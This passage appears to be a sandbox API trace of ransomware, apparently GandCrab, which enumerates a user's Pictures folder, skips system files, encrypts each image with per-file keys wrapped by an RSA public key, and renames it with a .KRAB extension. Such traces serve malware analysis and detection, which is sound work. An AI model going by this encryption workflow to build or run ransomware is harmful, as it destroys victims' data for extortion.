(lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\KRAB-DECRYPT.txt") returned 76 [0097.744] lstrlenW (lpString=".txt") returned 4 [0097.744] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.745] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0097.745] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.745] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\KRAB-DECRYPT.txt") returned 76 [0097.745] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\KRAB-DECRYPT.txt") returned 76 [0097.745] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0097.745] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0097.745] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0097.745] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0097.745] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0097.745] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0097.745] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0097.745] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0097.745] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0097.745] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0097.745] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.746] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.746] lstrcmpW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2=".") returned 1 [0097.746] lstrcmpW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="..") returned 1 [0097.746] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="LXwA52Zllk2Ypga4Y.bmp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\LXwA52Zllk2Ypga4Y.bmp") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\LXwA52Zllk2Ypga4Y.bmp" [0097.746] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.746] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\LXwA52Zllk2Ypga4Y.bmp.KRAB") returned 86 [0097.746] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\LXwA52Zllk2Ypga4Y.bmp") returned 81 [0097.746] lstrlenW (lpString=".bmp") returned 4 [0097.746] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.746] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".bmp ") returned 5 [0097.746] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.747] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\LXwA52Zllk2Ypga4Y.bmp") returned 81 [0097.747] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\LXwA52Zllk2Ypga4Y.bmp") returned 81 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="desktop.ini") returned 1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="autorun.inf") returned 1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="ntuser.dat") returned -1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="iconcache.db") returned 1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="bootsect.bak") returned 1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="boot.ini") returned 1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="ntuser.dat.log") returned -1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="thumbs.db") returned -1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="KRAB-DECRYPT.html") returned 1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="ntldr") returned -1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="NTDETECT.COM") returned -1 [0097.747] lstrcmpiW (lpString1="LXwA52Zllk2Ypga4Y.bmp", lpString2="Bootfont.bin") returned 1 [0097.747] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.747] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010df8) returned 1 [0097.748] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.748] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.748] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.748] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.748] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.748] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.749] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10111b0) returned 1 [0097.749] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.749] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.750] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.750] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.750] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0097.750] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.750] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0097.750] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.750] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.750] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.753] GetLastError () returned 0x0 [0097.753] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.753] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.753] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0097.754] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.754] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.754] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.754] GetLastError () returned 0x0 [0097.754] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.754] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.754] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\LXwA52Zllk2Ypga4Y.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\lxwa52zllk2ypga4y.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.755] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.755] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.755] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0xd6c8, lpOverlapped=0x0) returned 1 [0097.770] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xffff2938, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.770] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xd6c8, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0xd6c8, lpOverlapped=0x0) returned 1 [0097.771] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.771] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.774] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.775] CloseHandle (hObject=0x778) returned 1 [0097.775] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.775] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\LXwA52Zllk2Ypga4Y.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\lxwa52zllk2ypga4y.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\LXwA52Zllk2Ypga4Y.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\lxwa52zllk2ypga4y.bmp.krab")) returned 1 [0097.776] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.776] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.776] lstrcmpW (lpString1="mkDBMOUOpiJ.jpg", lpString2=".") returned 1 [0097.776] lstrcmpW (lpString1="mkDBMOUOpiJ.jpg", lpString2="..") returned 1 [0097.776] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="mkDBMOUOpiJ.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\mkDBMOUOpiJ.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\mkDBMOUOpiJ.jpg" [0097.776] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.776] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\mkDBMOUOpiJ.jpg.KRAB") returned 80 [0097.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\mkDBMOUOpiJ.jpg") returned 75 [0097.777] lstrlenW (lpString=".jpg") returned 4 [0097.777] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.777] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".jpg ") returned 5 [0097.777] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.777] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\mkDBMOUOpiJ.jpg") returned 75 [0097.777] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\mkDBMOUOpiJ.jpg") returned 75 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="desktop.ini") returned 1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="autorun.inf") returned 1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="ntuser.dat") returned -1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="iconcache.db") returned 1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="bootsect.bak") returned 1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="boot.ini") returned 1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="ntuser.dat.log") returned -1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="thumbs.db") returned -1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="ntldr") returned -1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="NTDETECT.COM") returned -1 [0097.777] lstrcmpiW (lpString1="mkDBMOUOpiJ.jpg", lpString2="Bootfont.bin") returned 1 [0097.777] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.778] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10114e0) returned 1 [0097.778] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.779] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.779] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.779] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.779] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0097.779] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.779] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010f90) returned 1 [0097.779] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.780] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.780] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.780] CryptGenRandom (in: hProv=0x1010f90, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0097.780] CryptReleaseContext (hProv=0x1010f90, dwFlags=0x0) returned 1 [0097.780] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.780] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1011898) returned 1 [0097.781] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.781] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.781] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.781] GetLastError () returned 0x0 [0097.781] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.781] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.781] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x1010df8) returned 1 [0097.782] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd5a0) returned 1 [0097.782] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0097.782] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0097.782] GetLastError () returned 0x0 [0097.782] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.782] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.782] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\mkDBMOUOpiJ.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\mkdbmouopij.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0097.783] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.783] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.783] ReadFile (in: hFile=0x778, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x16927, lpOverlapped=0x0) returned 1 [0097.796] SetFilePointerEx (in: hFile=0x778, liDistanceToMove=0xfffe96d9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.797] WriteFile (in: hFile=0x778, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x16927, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x16927, lpOverlapped=0x0) returned 1 [0097.797] WriteFile (in: hFile=0x778, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0097.797] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.802] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.803] CloseHandle (hObject=0x778) returned 1 [0097.803] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.803] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\mkDBMOUOpiJ.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\mkdbmouopij.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\mkDBMOUOpiJ.jpg.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\rkknroy7mtqm7yma8hq\\tpxohu-l\\mkdbmouopij.jpg.krab")) returned 1 [0097.804] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.805] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0097.805] lstrcmpW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2=".") returned 1 [0097.805] lstrcmpW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="..") returned 1 [0097.805] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\", lpString2="oFoYenXpMLTIQJhlEsN_.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\oFoYenXpMLTIQJhlEsN_.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\oFoYenXpMLTIQJhlEsN_.png" [0097.805] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.805] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\oFoYenXpMLTIQJhlEsN_.png.KRAB") returned 89 [0097.805] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\oFoYenXpMLTIQJhlEsN_.png") returned 84 [0097.805] lstrlenW (lpString=".png") returned 4 [0097.805] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.806] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0097.806] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.806] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\oFoYenXpMLTIQJhlEsN_.png") returned 84 [0097.806] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\rKkNRoy7mtqm7yma8Hq\\TPxOHu-l\\oFoYenXpMLTIQJhlEsN_.png") returned 84 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="desktop.ini") returned 1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="autorun.inf") returned 1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="ntuser.dat") returned 1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="iconcache.db") returned 1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="bootsect.bak") returned 1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="boot.ini") returned 1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="ntuser.dat.log") returned 1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="thumbs.db") returned -1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="KRAB-DECRYPT.html") returned 1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="ntldr") returned 1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="NTDETECT.COM") returned 1 [0097.806] lstrcmpiW (lpString1="oFoYenXpMLTIQJhlEsN_.png", lpString2="Bootfont.bin") returned 1 [0097.806] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.807] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10113d0) returned 1 [0097.807] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.808] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.808] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.808] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0097.808] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0097.808] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.808] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011898) returned 1 [0097.809] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.809] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.809] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.809] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, 